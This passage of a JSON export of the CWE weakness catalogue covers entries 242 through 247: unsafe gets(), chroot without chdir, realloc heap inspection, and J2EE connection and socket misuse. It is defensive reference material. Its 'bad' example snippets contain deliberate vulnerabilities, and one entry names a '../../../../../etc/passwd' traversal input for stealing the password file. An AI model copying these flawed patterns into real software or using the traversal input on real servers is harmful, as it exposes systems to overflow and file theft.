checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1156","Description":"FTP server crash via PORT command with non-numeric character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1156"},{"Reference":"CVE-2004-0270","Description":"Anti-virus product has assert error when line length is non-numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0270"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Data Type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume that fgets() or fgetws() returns a nonempty string when successful","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"48"}}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wrong Data Type","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Wrong Data Type","attr":{"@_Date":"2009-03-10"}}]}},"242":{"attr":{"@_ID":"242","@_Name":"Use of Inherently Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a function that can never be guaranteed to work safely.","Extended_Description":"Certain functions behave in dangerous ways regardless of how they are used. Functions in this category were often implemented without taking security concerns into account. The gets() function is unsafe because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to gets() and overflow the destination buffer. Similarly, the >> operator is unsafe to use when reading into a statically-allocated character array because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to the >> operator and overflow the destination buffer.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Requirements"],"Description":"Ban the use of dangerous functions. Use their safe equivalent."},{"Phase":"Testing","Description":"Use grep or static analysis tools to spot usage of dangerous functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below calls gets() to read information into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[BUFSIZE];gets(buf);","xhtml:br":""}},"Body_Text":"The gets() function in C is inherently unsafe."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press <Enter>\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS33-C","Entry_Name":"Do not use vfork()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-194","@_Section":"Chapter 5. Working with I/O"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "gets and fgets" Page 163"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Dangerous Functions","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Inherently Dangerous Functions","attr":{"@_Date":"2008-04-11"}}]}},"243":{"attr":{"@_ID":"243","@_Name":"Creation of chroot Jail Without Changing Working Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.","Extended_Description":"Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process\'s current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following source code from a (hypothetical) FTP server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(\\"/var/ftproot\\");...fgets(filename, sizeof(filename), network);localfile = fopen(filename, \\"r\\");while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {}fclose(localfile);","xhtml:br":["","","","",""],"xhtml:div":{"#text":"fwrite(buf, 1, sizeof(buf), network);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir(\\"/\\"), an attacker could request the file \\"../../../../../etc/passwd\\" and obtain a copy of the system password file."}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Directory Restriction"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP17","Entry_Name":"Failed chroot jail"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Directory Restriction","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Change Working Directory in chroot Jail","attr":{"@_Date":"2010-12-13"}}]}},"244":{"attr":{"@_ID":"244","@_Name":"Improper Clearing of Heap Memory Before Release (\'Heap Inspection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.","Extended_Description":"When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a \\"heap inspection\\" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"669","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Memory","Other"],"Note":"Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Heap Inspection"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Heap Inspection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Clear Heap Memory Before Release","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Clear Heap Memory Before Release (aka \'Heap Inspection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Clear Heap Memory Before Release (\'Heap Inspection\')","attr":{"@_Date":"2010-12-13"}}]}},"245":{"attr":{"@_ID":"245","@_Name":"J2EE Bad Practices: Direct Management of Connections","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly manages connections, instead of using the container\'s connection management facilities.","Extended_Description":"The J2EE standard forbids the direct management of connections. It requires that applications use the container\'s resource management facilities to obtain connections to resources. Every major web application container provides pooled database connection management as part of its resource management framework. Duplicating this functionality in an application is difficult and error prone, which is part of the reason it is forbidden under the J2EE standard.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, the class DatabaseConnection opens and manages a connection to a database for a J2EE application. The method openDatabaseConnection opens a connection to the database using a DriverManager to create the Connection object conn to the database specified in the string constant CONNECT_STRING.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String CONNECT_STRING = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"try {} catch (SQLException ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"conn = DriverManager.getConnection(CONNECT_STRING);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public class DatabaseConnection {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private static final String DB_DATASRC_REF = \\"jdbc:mysql://localhost:3306/mysqldb\\";private Connection conn = null;public DatabaseConnection() {}public void openDatabaseConnection() {}// Member functions for retrieving database connection and accessing database...","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (NamingException ex) {...}} catch (SQLException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"InitialContext ctx = new InitialContext();DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);conn = datasource.getConnection();","xhtml:br":["","",""]}},"xhtml:br":""}}}}}}],"Body_Text":"The use of the DriverManager class to directly manage the connection to the database violates the J2EE restriction against the direct management of connections. The J2EE application should use the web application container\'s resource management facilities to obtain a connection to the database as shown in the following example."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: getConnection()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: getConnection()","attr":{"@_Date":"2008-04-11"}}}},"246":{"attr":{"@_ID":"246","@_Name":"J2EE Bad Practices: Direct Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application directly uses sockets instead of using framework method calls.","Extended_Description":{"xhtml:p":["The J2EE standard permits the use of sockets only for the purpose of communication with legacy systems when no higher-level protocol is available. Authoring your own communication protocol requires wrestling with difficult security issues.","Without significant scrutiny by a security expert, chances are good that a custom communication protocol will suffer from security problems. Many of the same issues apply to a custom implementation of a standard protocol. While there are usually more resources available that address security concerns related to implementing a standard protocol, these resources are also available to attackers."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use framework method calls instead of using sockets directly."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example opens a socket to connect to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Socket sock = null;try {} catch (Exception e) {}","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Open a socket to a remote server (bad)."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(remoteHostname, 3000);...","xhtml:br":["","",""],"xhtml:i":"// Do something with the socket."}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},"Body_Text":"A Socket object is created directly within the Java servlet, which is a dangerous way to manage remote connections."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Sockets"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: Sockets","attr":{"@_Date":"2008-04-11"}}}},"247":{"attr":{"@_ID":"247","@_Name":"DEPRECATED: Reliance on DNS Lookups in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content 